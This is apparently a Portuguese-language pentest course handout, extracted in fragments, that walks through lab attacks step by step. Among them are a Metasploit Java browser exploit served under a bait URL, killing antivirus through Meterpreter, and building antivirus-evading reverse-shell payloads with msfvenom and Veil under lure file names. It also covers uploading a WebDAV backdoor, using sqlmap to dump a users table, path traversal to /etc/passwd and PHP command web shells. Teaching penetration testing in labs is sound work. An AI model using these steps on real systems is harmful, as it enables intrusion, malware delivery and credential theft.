Escolar Documentos
Profissional Documentos
Cultura Documentos
Sandro Melo
Este documento destina-se exclusivamente aos cursos que realizo para uso específico nas
disciplinas ministradas em cursos de Graduação e Pós Graduação, sobre temas inerentes
principalmente a Sistema Operacionais, Redes de Computadores, Segurança Computacional,
Pentest, Computação Forense e Engenharia Reversa.
O uso indevido de qualquer conhecimento citado aqui é de total responsabilidade de quem utilizar
como também qualquer dano causado a qualquer sistema computacional de sua propriedade ou não.
Este material não pode ser copiado ou divulgado, total ou parcialmente, sem a autorização formal
e expressa de seu autor.
Necessário destacar que outra fonte relevante são os sites de projetos de comunidade FLOSS.
Sendo relevante destacar que o Modelo Software Livre tem como princípio a segurança
fundamentada na transparência do código aberto que pode ser auditado e questionado a qualquer
momento. Códigos fruto de pesquisa que na sua maioria são oriundos em centros de pesquisas de
Universidade dos quatro cantos do planeta.
Em momento algum é uma referência definitiva, dessa forma as bibliografias indicadas e/ou
referenciadas são base para uma formação sólida e coesa.
Técnica:
Consiste na exploração da falha de serviços nos mais variados tipos servidores e plataforma operacional a partir de
um conceitos automatizado, por uma ferramenta que utiliza uma base conhecimento de exploração.
Ferramentas:
Nmap, Metasploit Framework com Meterpreter
Importância p/ Pen-test:
Após todo o processo de um Pentest, principalmente após Scanners de Vulnerabilidades, é importante ratificar o
quanto uma vulnerabilidade é realmente um ameaça.
OSSTMM recomenda:
Identificação de informações do S.O.
Identificação de versão da aplicações utilizadas
Identificação de Vulnerabilidades
Buscar informações que possam possibilitar o Pentester ganhar acesso
Contramedidas:
Após quantificar e qualificar os problemas o Profissional de Segurança deve aplicar todas as correções necessárias
1 – Execução do MSF
a) Instalacao de pre-requesisto:
# ./msfconsole
Matching Modules
================
Exploit targets:
Id Name
-- ----
0 Generic (Java Payload)
1 Windows x86 (Native Payload)
2 Mac OS X x86 (Native Payload)
3 Linux x86 (Native Payload)
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2013-01-10
References:
https://cvedetails.com/cve/CVE-2013-0422/
OSVDB (89059)
https://www.kb.cert.org/vuls/id/625617
http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-
disable.html
http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/
http://pastebin.com/cUG2ayjh
http://www.securityfocus.com/bid/45246
http://www.microsoft.com/technet/security/advisory/2488013.mspx
http://www.wooyun.org/bugs/wooyun-2010-0885
http://seclists.org/fulldisclosure/2010/Dec/110
https://technet.microsoft.com/en-us/library/security/MS11-003
Exploit target:
Id Name
-- ----
0 Generic (Java Payload)
Exploit target:
Id Name
-- ----
0 Automatic
SRVHOST= <ip.do.kali>
URIPATH = nome sugestivo como: promoção, grátis, free
Execução do comando show options, para visualizar novamente as configurações, validar as parametrizações
já realizada e identificar as variáveis do payload que demandam parametrização:
Exploit target:
Id Name
-- ----
0 Generic (Java Payload)
Execução do exploit:
msf exploit(multi/browser/java_jre17_jmxbean) > exploit
[*] Exploit running as background job 0.
Com o exploit em execução o Pentester terá que atrair o alvo de alguma forma, para acessar a url fornecida
pelo Metasploit (http://ip.do.ka.li:3128/gratis). Avaliei quais as possibilidades neste cenário:
Exemplificação da exploração, onde se destacam importantes informações, o seja que o Metasploit enviou a
informações para explorar o navegado e na sequencia uma sessão foi aberta com o Meterpreter o que indicar
total sucesso na explorar. Posteriormente outra sessão é aberta pelo Meterpreter:
Enquanto o exploit está em execução e fornecido a informação que a página está sendo carregada o que pode
motivar o usuário a aguarda, achando que tem algum problema com a url que acessou, mas possivelmente não
motivando uma desconfiança maior sobre o que realmente está ocorrendo:
Active sessions
===============
Para selecionar a sessão que se deseja interagir, basta usar o comando sessions seguido o número
da sessão:
Neste cenário onde a instalação do Windows foi baseada em um único usuário que também é
administrador, uma vez comprometido o navegador, tem-se o acesso como administrador:
Uma das primeiras ações em um ambiente comprometido é desabilitar suas defesas, como por
exemplo buscar e matar os processo vinculados antivírus e HIPS. Essa tarefa também pode se
executada via Meterpreter executando o modulo “killav”:
Identificando máquina comprometida é uma é um sistema “bare metal” ou uma máquina virtual :
meterpreter > run checkvm
C:\Users\win7buguento\Desktop>
Subir Kali
Subir Win8
( Exercício 1 )
# msfvenom -a x86 --platform windows -p windows/meterpreter_reverse_tcp
LHOST=192.168.100.175 LPORT=443 -f exe -o /var/www/html/BG1.exe
# ls –l /var/www/html/BG2.exe
# file /var/www/html/BG2.exe
# xxd /var/www/html/BG2.exe | head –n 2
( Exercício 2 )
Gera 2o exemplo de Malware
Consultar um encoder
# msfonsole
# search encoder
# exit
PS: "Shikata ga nai (?), pronounced [xi̥ kata ɡa nai], is a Japanese language phrase meaning "nothing
can be done about it"
è
( Exercício 3 )
Gera 3o exemplo de Malware
# veil
list
use Evasion
list
use 2
use python/meterpreter/rev_tcp.py
generate
è foto_dr_bumbum3
use 2
( Exercício 4 )
Gera 4o exemplo de Malware
list
use python/shellcode_inject/aes_encrypt.py
generate
è foto_dr_bumbum4
use 2
( Exercício 5)
Gera 5o exemplo de Malware
list
(powershell/meterpreter/rev_https)
use 38
set LHOST ip.do.ka.li
generate
è foto_dr_bumbum5
exit
exit
# cd /var/lib/veil/output/compiled/
Obs.: Para receber a conexão deve-se usar o exploit/multi/handler para receber a conexão reversa
DOS
1 -2 Clássico ataque Ping da Morte
# t50 –help
No Win2k8
No metasploitablev2
b) Analise o resultado:
# Firefox relatório_dav.html
c) Execute a ferramenta cadaver sem parametros para visualizer a mensagem de ajuda com a lista
de comandos disponíveis:
# cadaver
dav:!> help
5 - Sabendo-se que o recurso WEBDAV está disponível, pode inserir Backdoors no Servidor
Web
d) Utilize a vulnerabilidades via comando PUT para inserir a backdoor com a ferramenta “cadaver”
# cadaver http://ip.ip.ip.ip/dav
dav:!> put /root/METAv2/html/ evilphp.php
dav:!> quit
b) Avalie o relatório do Vega e tente identificar áreas do site que sejam sucentíveis a ataque de SQL
Injection
c) Segunda tentativa de levamento, aumentado o nível do teste e do risco para o valor máximo:
# sqlmap -u "testphp.vulnweb.com/listproducts.php?cat=1"--level 5 --risk 3
p) Downlaod (dump) das informações das tabela “users” no banco dados alvo “acuart”
# sqlmap -u "testphp.vulnweb.com/listproducts.php?cat=1" --dump -D acuart
-T users
t) Agora que tem as informações, faça o login no site com as credencias do usuário John Smith
b) Segunda tentativa de levamento, aumentado o nível do teste e do risco para o valor máximo:
# sqlmap -u demo.testfire.net/bank/login.aspx --data
"uid=test&passw=pass&btnSubmit=Login" --level 5 --risk 3
Inicialize o Windows Server 2k8, apos realizar o login inicialize o serviço WAMP Server:
# tar xzvf heartbleet.tar.gz –C /
# chmod +x /usr/bin/heartbleet.py
via browser l
http://[IP-METAv3]/mutillidae/index.php?page=../../../../../../etc/passwd
METASPLOTLABEv2 (Mutillidae)
/var/www/html/
# vim /var/www/html/sys.php
# vim /var/www/html/cmd.php
http://127.0.0.1/sys.php?e=whoami
http://192.168.100.154/mutillidae/sys.php?e=ls